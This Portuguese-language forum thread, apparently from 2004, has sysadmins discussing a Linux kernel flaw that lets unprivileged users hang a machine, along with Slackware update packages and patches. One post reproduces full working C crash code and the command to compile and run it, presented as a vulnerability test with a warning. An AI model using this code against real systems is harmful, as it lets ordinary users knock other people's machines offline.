Página 1 de 2 12 ÚltimoÚltimo
+ Responder ao Tópico



  1. #1
    bouncer
    Visitante

    Padrão falha no kernel

    quero saber como fazer pra aualiazar meu kernel..tenho que recompilar ele de volta..distro. .slackware 9.1
    ou vou ter que dar
    upgradepkg kernel-ide-2.4.26-i486-3.tgz
    upgradepkg kernel-source-2.4.26-noarch-2.tgz



    Slackware 9.1 packages:
    614b79763721126939569f235d4524d6 kernel-ide-2.4.26-i486-3.tgz
    43681f735928641a2b5fc786604bca77 kernel-source-2.4.26-noarch-2.tgz


    Updated packages for Slackware 9.1:
    ftp://ftp.slackware.com/pub/slackwar....26-i486-3.tgz
    ftp://ftp.slackware.com/pub/slackwar...6-noarch-2.tgz
    ftp://ftp.slackware.com/pub/slackwar...tches/kernels/

  2. #2

    Padrão falha no kernel

    como sempre slack resolvendo nossos problemas
    pena q o ftp ta LOTADO eu queria baixar soh o patch pra poder usar na minha distro... num queria o kernel inteiro

  3. #3
    bouncer
    Visitante

    Padrão ai mano

    1c3_m4n ...
    entao tem jeito de pegar so patch...vou pegar kernel inteiro...

    isso que ta foda..hehe quero saber qual deve pegar aqui em

    Updated packages for Slackware 9.1:
    ftp://ftp.slackware.com/pub/slackwar....26-i486-3.tgz
    ftp://ftp.slackware.com/pub/slackwar...6-noarch-2.tgz
    ftp://ftp.slackware.com/pub/slackwar...tches/kernels/

  4. #4

    Padrão falha no kernel

    entaum eu sei q tem soh q o ftp.slackware.com ta lotado pq ta todo mundo baixando... eu queria pegar soh o font de patch pra eu customizar pra minha distro...

    entaum cara vc tem q usar o kernel-source se vc quiser recompilar, se for soh atualizar eh soh o ide

  5. #5

    Padrão falha no kernel

    Foi divulgada a descoberta de uma falha no Kernel do Linux. Esta falha faz com que um código malicioso provoque um crash, travando todo o sistema. A falha atinge as versões 2.4.2x e 2.6.x nas arquiteturas x86 e x86_86.
    O problema ocorre quando o código malicioso é compilado. O que torna o problema mais grave é que para compilar o código, o usuário não precisa ser root: qualquer user com acesso a shell pode fazê-lo.


    Os patches para correção do problema já estão disponíveis e podem ser baixados aqui: http://www.linuxreviews.org/news/200...ndex.html#toc6


    http://www.linuxreviews.org/news/200...ash/index.html


    http://www.golivre.org/modules.php?n...rticle&sid=359

  6. #6

    Padrão falha no kernel

    Citação Postado originalmente por Pedro0278
    ESSES PATCHES SAO UMA GAMBIARRA!!!!!!!!!!!!!
    Eles soh num deixam a maquina travar mas deixa um processo com 99% da CPU
    a noite vou testar o do slack pra ver oq acontece

  7. #7

    Padrão falha no kernel

    Vixe cara.... tu tá tão desesperado que ja tentou de tudo hem???

    Ainda bem que meu Kernel é o 2.4.25 senão estaria doido também a uma hora dessas...

  8. #8

    Padrão falha no kernel

    HEheheh eu num to desesperado naum pq ninguem tem acesso aos meus servers...
    mas to preocupado pq isso eh uma falha grave descoberta no dia 11 e soh AGORA foram arrumar alguma solucao.... imagina qtas maquinas num estao sendo travadas nesse instante

  9. #9

    Padrão falha no kernel

    pq tu não tenta compilar o Kernel 2.2.25 para tua máquina? não seria mais fácil doque usaresse problemático ai?

    Esse kernel que to usando é beleza... até agora não me trouxe nenhum problema.

  10. #10

    Padrão falha no kernel

    achu qvc quiz dizer o 2.4.25 neh? ele num ta vulneravel naum com vc???? pela lista ele eh sim.,...
    bom tem q ver q isso num depende soh do kernel, depende tb da versao do gcc q ele foi compilado,
    sao varios porens...

  11. #11

    Padrão falha no kernel

    The safe kernels
    This code does nothing but exit with the error message Floating point exception and can not do any damage to systems running
    Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
    Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
    Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
    Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
    Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
    2.2.19-kernel

    o seu num eh gentoo eh?

  12. #12
    bouncer
    Visitante

    Padrão ai que esta certo

    foda agora ter link pra pegar o kernel ja que esta tudo lotado....ehheh


    1c3_m4n

    vou ter que recompilar..tudo de novo..qual desse ser o certo
    mas pra serve esse bosta aqui em entao kernel-ide-2.4.26-i486-3.tgz



    Slackware 9.1 packages:
    614b79763721126939569f235d4524d6 kernel-ide-2.4.26-i486-3.tgz
    43681f735928641a2b5fc786604bca77 kernel-source-2.4.26-noarch-2.tgz


    Updated packages for Slackware 9.1:
    ftp://ftp.slackware.com/pub/slackwar....26-i486-3.tgz
    ftp://ftp.slackware.com/pub/slackwar...6-noarch-2.tgz
    ftp://ftp.slackware.com/pub/slackwar...tches/kernels/

  13. #13

    Padrão falha no kernel

    lah no site deles tem varios "mirrors" mas esses "mirrors" estao todos desatualizado, bom todos 5 q eu testei e o do brasil ta lotado tb

  14. #14

    Padrão falha no kernel

    não ir3_c4n uso o conectiva 8 e o Kurumin3.0

    Quem quiser se arriscar no teste do Kernel é só seguir os passos abaixo:

    Crie um arquivo com o código abaixo e chame-o de crash.c. Ou baixe-o diretamente daqui.

    #include
    #include
    #include

    static void Handler(int ignore)
    {
    char fpubuf[108];
    __asm__ __volatile__ ("fsave %0n" : : "m"(fpubuf));
    write(2, "*", 1);
    __asm__ __volatile__ ("frstor %0n" : : "m"(fpubuf));
    }

    int main(int argc, char *argv[])
    {
    struct itimerval spec;
    signal(SIGALRM, Handler);
    spec.it_interval.tv_sec=0;
    spec.it_interval.tv_usec=100;
    spec.it_value.tv_sec=0;
    spec.it_value.tv_usec=100;
    setitimer(ITIMER_REAL, &spec, NULL);
    while(1)
    write(1, ".", 1);

    return 0;
    }

    Em seguida rode o comando abaixo a partir de um terminal como usuário comum

    $ gcc crash.c -o evil && ./evil

    Se seu kernel tiver a vulnerabilidade explorada por esse programa, sua máquina vai travar completamente.

    Repito:ATENÇÃO: NÃO APLIQUE O TESTE ABAIXO NUM SERVIDOR EM PRODUÇÃO.
    É recomendável fazer backup, parar o serviço e executar o teste. O melhor é se informar no site de sua distro e obter atualizações, caso necessário.

  15. #15
    bouncer
    Visitante

    Padrão 1c3_m4n leia isso..ai

    cara tenho que pegar so isso..
    aqui em
    1c3_m4n

    upgradepkg kernel-ide-2.4.26-i486-3.tgz
    upgradepkg kernel-source-2.4.26-noarch-2.tgz

  16. #16
    Rooter
    Visitante

    Padrão falha no kernel

    Pessoal doidinho pra atualizar o kernel hehe... eu tb

    Queria aproveitar, ja que estamos falando do kernel e não seria necessario abrir outro topico, pra perguntar uma coisa: alguns meses atrás surgiu uma falha na função mremap() do kernel que afeta as versoes <=2.4.24 se nao me engano, e algumas do 2.6.... até aí tudo bem, mas tive a impressão de ter outra falha após essa descoberta, na mesma função... alguem ta sabendo?

    Soh to querendo matar 2 coelhos com um tiro só... esse System Crash que vcs tao falando e essa falha do mremap().. assim recompilo o kernel e me livro disso :P

  17. #17

    Padrão falha no kernel

    num fiquei sabendo dessa outra falha nao, vou dar uma pesquisada

  18. #18
    Rooter
    Visitante

    Padrão falha no kernel

    É uma falha local, de escalacao de privilégio...

    http://www.isec.pl/vulnerabilities/i...emap-unmap.txt

  19. #19

    Padrão falha no kernel

    E ai, alguém testou o patch do Slack? Funciona? Ele serve para as outras distros, se eu baixar os fontes e compilar no meu Debian funciona?


    Abraços
    Dirceu

  20. #20
    devlinmaxx
    Visitante

    Padrão falha no kernel

    Pergunta bobinha: se não tiver gcc na máquina, CRARU que não vai ter vulnerabilidade correto?